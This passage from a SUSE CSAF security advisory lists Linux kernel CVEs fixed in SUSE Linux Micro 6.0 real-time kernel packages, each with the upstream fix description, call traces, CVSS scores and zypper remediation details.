"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54189",
"url": "https://www.suse.com/security/cve/CVE-2023-54189"
},
{
"category": "external",
"summary": "SUSE Bug 1255978 for CVE-2023-54189",
"url": "https://bugzilla.suse.com/1255978"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54189"
},
{
"cve": "CVE-2023-54194",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54194"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nexfat: use kvmalloc_array/kvfree instead of kmalloc_array/kfree\n\nThe call stack shown below is a scenario in the Linux 4.19 kernel.\nAllocating memory failed where exfat fs use kmalloc_array due to\nsystem memory fragmentation, while the u-disk was inserted without\nrecognition.\nDevices such as u-disk using the exfat file system are pluggable and\nmay be insert into the system at any time.\nHowever, long-term running systems cannot guarantee the continuity of\nphysical memory. Therefore, it\u0027s necessary to address this issue.\n\nBinder:2632_6: page allocation failure: order:4,\n mode:0x6040c0(GFP_KERNEL|__GFP_COMP), nodemask=(null)\nCall trace:\n[242178.097582] dump_backtrace+0x0/0x4\n[242178.097589] dump_stack+0xf4/0x134\n[242178.097598] warn_alloc+0xd8/0x144\n[242178.097603] __alloc_pages_nodemask+0x1364/0x1384\n[242178.097608] kmalloc_order+0x2c/0x510\n[242178.097612] kmalloc_order_trace+0x40/0x16c\n[242178.097618] __kmalloc+0x360/0x408\n[242178.097624] load_alloc_bitmap+0x160/0x284\n[242178.097628] exfat_fill_super+0xa3c/0xe7c\n[242178.097635] mount_bdev+0x2e8/0x3a0\n[242178.097638] exfat_fs_mount+0x40/0x50\n[242178.097643] mount_fs+0x138/0x2e8\n[242178.097649] vfs_kern_mount+0x90/0x270\n[242178.097655] do_mount+0x798/0x173c\n[242178.097659] ksys_mount+0x114/0x1ac\n[242178.097665] __arm64_sys_mount+0x24/0x34\n[242178.097671] el0_svc_common+0xb8/0x1b8\n[242178.097676] el0_svc_handler+0x74/0x90\n[242178.097681] el0_svc+0x8/0x340\n\nBy analyzing the exfat code,we found that continuous physical memory\nis not required here,so kvmalloc_array is used can solve this problem.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54194",
"url": "https://www.suse.com/security/cve/CVE-2023-54194"
},
{
"category": "external",
"summary": "SUSE Bug 1255974 for CVE-2023-54194",
"url": "https://bugzilla.suse.com/1255974"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "low"
}
],
"title": "CVE-2023-54194"
},
{
"cve": "CVE-2023-54201",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54201"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/efa: Fix wrong resources deallocation order\n\nWhen trying to destroy QP or CQ, we first decrease the refcount and\npotentially free memory regions allocated for the object and then\nrequest the device to destroy the object. If the device fails, the\nobject isn\u0027t fully destroyed so the user/IB core can try to destroy the\nobject again which will lead to underflow when trying to decrease an\nalready zeroed refcount.\n\nDeallocate resources in reverse order of allocating them to safely free\nthem.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54201",
"url": "https://www.suse.com/security/cve/CVE-2023-54201"
},
{
"category": "external",
"summary": "SUSE Bug 1255964 for CVE-2023-54201",
"url": "https://bugzilla.suse.com/1255964"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.8,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54201"
},
{
"cve": "CVE-2023-54204",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54204"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmmc: sunplus: fix return value check of mmc_add_host()\n\nmmc_add_host() may return error, if we ignore its return value,\n1. the memory allocated in mmc_alloc_host() will be leaked\n2. null-ptr-deref will happen when calling mmc_remove_host()\nin remove function spmmc_drv_remove() because deleting not\nadded device.\n\nFix this by checking the return value of mmc_add_host(). Moreover,\nI fixed the error handling path of spmmc_drv_probe() to clean up.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54204",
"url": "https://www.suse.com/security/cve/CVE-2023-54204"
},
{
"category": "external",
"summary": "SUSE Bug 1255967 for CVE-2023-54204",
"url": "https://bugzilla.suse.com/1255967"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54204"
},
{
"cve": "CVE-2023-54207",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54207"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nHID: uclogic: Correct devm device reference for hidinput input_dev name\n\nReference the HID device rather than the input device for the devm\nallocation of the input_dev name. Referencing the input_dev would lead to a\nuse-after-free when the input_dev was unregistered and subsequently fires a\nuevent that depends on the name. At the point of firing the uevent, the\nname would be freed by devres management.\n\nUse devm_kasprintf to simplify the logic for allocating memory and\nformatting the input_dev name string.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54207",
"url": "https://www.suse.com/security/cve/CVE-2023-54207"
},
{
"category": "external",
"summary": "SUSE Bug 1255961 for CVE-2023-54207",
"url": "https://bugzilla.suse.com/1255961"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.8,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54207"
},
{
"cve": "CVE-2023-54209",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54209"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nblock: fix blktrace debugfs entries leakage\n\nCommit 99d055b4fd4b (\"block: remove per-disk debugfs files in\nblk_unregister_queue\") moves blk_trace_shutdown() from\nblk_release_queue() to blk_unregister_queue(), this is safe if blktrace\nis created through sysfs, however, there is a regression in corner\ncase.\n\nblktrace can still be enabled after del_gendisk() through ioctl if\nthe disk is opened before del_gendisk(), and if blktrace is not shutdown\nthrough ioctl before closing the disk, debugfs entries will be leaked.\n\nFix this problem by shutdown blktrace in disk_release(), this is safe\nbecause blk_trace_remove() is reentrant.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54209",
"url": "https://www.suse.com/security/cve/CVE-2023-54209"
},
{
"category": "external",
"summary": "SUSE Bug 1255963 for CVE-2023-54209",
"url": "https://bugzilla.suse.com/1255963"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54209"
},
{
"cve": "CVE-2023-54210",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54210"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: hci_sync: Avoid use-after-free in dbg for hci_remove_adv_monitor()\n\nKASAN reports that there\u0027s a use-after-free in\nhci_remove_adv_monitor(). Trawling through the disassembly, you can\nsee that the complaint is from the access in bt_dev_dbg() under the\nHCI_ADV_MONITOR_EXT_MSFT case. The problem case happens because\nmsft_remove_monitor() can end up freeing the monitor\nstructure. Specifically:\n hci_remove_adv_monitor() -\u003e\n msft_remove_monitor() -\u003e\n msft_remove_monitor_sync() -\u003e\n msft_le_cancel_monitor_advertisement_cb() -\u003e\n hci_free_adv_monitor()\n\nLet\u0027s fix the problem by just stashing the relevant data when it\u0027s\nstill valid.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54210",
"url": "https://www.suse.com/security/cve/CVE-2023-54210"
},
{
"category": "external",
"summary": "SUSE Bug 1255955 for CVE-2023-54210",
"url": "https://bugzilla.suse.com/1255955"
},
{
"category": "external",
"summary": "SUSE Bug 1255956 for CVE-2023-54210",
"url": "https://bugzilla.suse.com/1255956"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "important"
}
],
"title": "CVE-2023-54210"
},
{
"cve": "CVE-2023-54211",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54211"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntracing: Fix warning in trace_buffered_event_disable()\n\nWarning happened in trace_buffered_event_disable() at\n WARN_ON_ONCE(!trace_buffered_event_ref)\n\n Call Trace:\n ? __warn+0xa5/0x1b0\n ? trace_buffered_event_disable+0x189/0x1b0\n __ftrace_event_enable_disable+0x19e/0x3e0\n free_probe_data+0x3b/0xa0\n unregister_ftrace_function_probe_func+0x6b8/0x800\n event_enable_func+0x2f0/0x3d0\n ftrace_process_regex.isra.0+0x12d/0x1b0\n ftrace_filter_write+0xe6/0x140\n vfs_write+0x1c9/0x6f0\n [...]\n\nThe cause of the warning is in __ftrace_event_enable_disable(),\ntrace_buffered_event_enable() was called once while\ntrace_buffered_event_disable() was called twice.\nReproduction script show as below, for analysis, see the comments:\n ```\n #!/bin/bash\n\n cd /sys/kernel/tracing/\n\n # 1. Register a \u0027disable_event\u0027 command, then:\n # 1) SOFT_DISABLED_BIT was set;\n # 2) trace_buffered_event_enable() was called first time;\n echo \u0027cmdline_proc_show:disable_event:initcall:initcall_finish\u0027 \u003e \\\n set_ftrace_filter\n\n # 2. Enable the event registered, then:\n # 1) SOFT_DISABLED_BIT was cleared;\n # 2) trace_buffered_event_disable() was called first time;\n echo 1 \u003e events/initcall/initcall_finish/enable\n\n # 3. Try to call into cmdline_proc_show(), then SOFT_DISABLED_BIT was\n # set again!!!\n cat /proc/cmdline\n\n # 4. Unregister the \u0027disable_event\u0027 command, then:\n # 1) SOFT_DISABLED_BIT was cleared again;\n # 2) trace_buffered_event_disable() was called second time!!!\n echo \u0027!cmdline_proc_show:disable_event:initcall:initcall_finish\u0027 \u003e \\\n set_ftrace_filter\n ```\n\nTo fix it, IIUC, we can change to call trace_buffered_event_enable() at\nfist time soft-mode enabled, and call trace_buffered_event_disable() at\nlast time soft-mode disabled.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54211",
"url": "https://www.suse.com/security/cve/CVE-2023-54211"
},
{
"category": "external",
"summary": "SUSE Bug 1255843 for CVE-2023-54211",
"url": "https://bugzilla.suse.com/1255843"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54211"
},
{
"cve": "CVE-2023-54215",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54215"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nvirtio-vdpa: Fix cpumask memory leak in virtio_vdpa_find_vqs()\n\nFree the cpumask allocated by create_affinity_masks() before returning\nfrom the function.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54215",
"url": "https://www.suse.com/security/cve/CVE-2023-54215"
},
{
"category": "external",
"summary": "SUSE Bug 1255957 for CVE-2023-54215",
"url": "https://bugzilla.suse.com/1255957"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54215"
},
{
"cve": "CVE-2023-54219",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54219"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nRevert \"IB/isert: Fix incorrect release of isert connection\"\n\nCommit: 699826f4e30a (\"IB/isert: Fix incorrect release of isert connection\") is\ncausing problems on OPA when DEVICE_REMOVAL is happening.\n\n ------------[ cut here ]------------\n WARNING: CPU: 52 PID: 2117247 at drivers/infiniband/core/cq.c:359\nib_cq_pool_cleanup+0xac/0xb0 [ib_core]\n Modules linked in: nfsd nfs_acl target_core_user uio tcm_fc libfc\nscsi_transport_fc tcm_loop target_core_pscsi target_core_iblock target_core_file\nrpcsec_gss_krb5 auth_rpcgss nfsv4 dns_resolver nfs lockd grace fscache netfs\nrfkill rpcrdma rdma_ucm ib_srpt sunrpc ib_isert iscsi_target_mod target_core_mod\nopa_vnic ib_iser libiscsi ib_umad scsi_transport_iscsi rdma_cm ib_ipoib iw_cm\nib_cm hfi1(-) rdmavt ib_uverbs intel_rapl_msr intel_rapl_common sb_edac ib_core\nx86_pkg_temp_thermal intel_powerclamp coretemp i2c_i801 mxm_wmi rapl iTCO_wdt\nipmi_si iTCO_vendor_support mei_me ipmi_devintf mei intel_cstate ioatdma\nintel_uncore i2c_smbus joydev pcspkr lpc_ich ipmi_msghandler acpi_power_meter\nacpi_pad xfs libcrc32c sr_mod sd_mod cdrom t10_pi sg crct10dif_pclmul\ncrc32_pclmul crc32c_intel drm_kms_helper drm_shmem_helper ahci libahci\nghash_clmulni_intel igb drm libata dca i2c_algo_bit wmi fuse\n CPU: 52 PID: 2117247 Comm: modprobe Not tainted 6.5.0-rc1+ #1\n Hardware name: Intel Corporation S2600CWR/S2600CW, BIOS\nSE5C610.86B.01.01.0014.121820151719 12/18/2015\n RIP: 0010:ib_cq_pool_cleanup+0xac/0xb0 [ib_core]\n Code: ff 48 8b 43 40 48 8d 7b 40 48 83 e8 40 4c 39 e7 75 b3 49 83\nc4 10 4d 39 fc 75 94 5b 5d 41 5c 41 5d 41 5e 41 5f c3 cc cc cc cc \u003c0f\u003e 0b eb a1\n90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 0f 1f\n RSP: 0018:ffffc10bea13fc80 EFLAGS: 00010206\n RAX: 000000000000010c RBX: ffff9bf5c7e66c00 RCX: 000000008020001d\n RDX: 000000008020001e RSI: fffff175221f9900 RDI: ffff9bf5c7e67640\n RBP: ffff9bf5c7e67600 R08: ffff9bf5c7e64400 R09: 000000008020001d\n R10: 0000000040000000 R11: 0000000000000000 R12: ffff9bee4b1e8a18\n R13: dead000000000122 R14: dead000000000100 R15: ffff9bee4b1e8a38\n FS: 00007ff1e6d38740(0000) GS:ffff9bfd9fb00000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 00005652044ecc68 CR3: 0000000889b5c005 CR4: 00000000001706e0\n Call Trace:\n \u003cTASK\u003e\n ? __warn+0x80/0x130\n ? ib_cq_pool_cleanup+0xac/0xb0 [ib_core]\n ? report_bug+0x195/0x1a0\n ? handle_bug+0x3c/0x70\n ? exc_invalid_op+0x14/0x70\n ? asm_exc_invalid_op+0x16/0x20\n ? ib_cq_pool_cleanup+0xac/0xb0 [ib_core]\n disable_device+0x9d/0x160 [ib_core]\n __ib_unregister_device+0x42/0xb0 [ib_core]\n ib_unregister_device+0x22/0x30 [ib_core]\n rvt_unregister_device+0x20/0x90 [rdmavt]\n hfi1_unregister_ib_device+0x16/0xf0 [hfi1]\n remove_one+0x55/0x1a0 [hfi1]\n pci_device_remove+0x36/0xa0\n device_release_driver_internal+0x193/0x200\n driver_detach+0x44/0x90\n bus_remove_driver+0x69/0xf0\n pci_unregister_driver+0x2a/0xb0\n hfi1_mod_cleanup+0xc/0x3c [hfi1]\n __do_sys_delete_module.constprop.0+0x17a/0x2f0\n ? exit_to_user_mode_prepare+0xc4/0xd0\n ? syscall_trace_enter.constprop.0+0x126/0x1a0\n do_syscall_64+0x5c/0x90\n ? syscall_exit_to_user_mode+0x12/0x30\n ? do_syscall_64+0x69/0x90\n ? syscall_exit_work+0x103/0x130\n ? syscall_exit_to_user_mode+0x12/0x30\n ? do_syscall_64+0x69/0x90\n ? exc_page_fault+0x65/0x150\n entry_SYSCALL_64_after_hwframe+0x6e/0xd8\n RIP: 0033:0x7ff1e643f5ab\n Code: 73 01 c3 48 8b 0d 75 a8 1b 00 f7 d8 64 89 01 48 83 c8 ff c3\n66 2e 0f 1f 84 00 00 00 00 00 90 f3 0f 1e fa b8 b0 00 00 00 0f 05 \u003c48\u003e 3d 01 f0\nff ff 73 01 c3 48 8b 0d 45 a8 1b 00 f7 d8 64 89 01 48\n RSP: 002b:00007ffec9103cc8 EFLAGS: 00000206 ORIG_RAX: 00000000000000b0\n RAX: ffffffffffffffda RBX: 00005615267fdc50 RCX: 00007ff1e643f5ab\n RDX: 0000000000000000 RSI: 0000000000000800 RDI: 00005615267fdcb8\n RBP: 00005615267fdc50 R08: 0000000000000000 R09: 0000000000000000\n R10: 00007ff1e659eac0 R11: 0000000000000206 R12: 00005615267fdcb8\n R13: 00000000000\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54219",
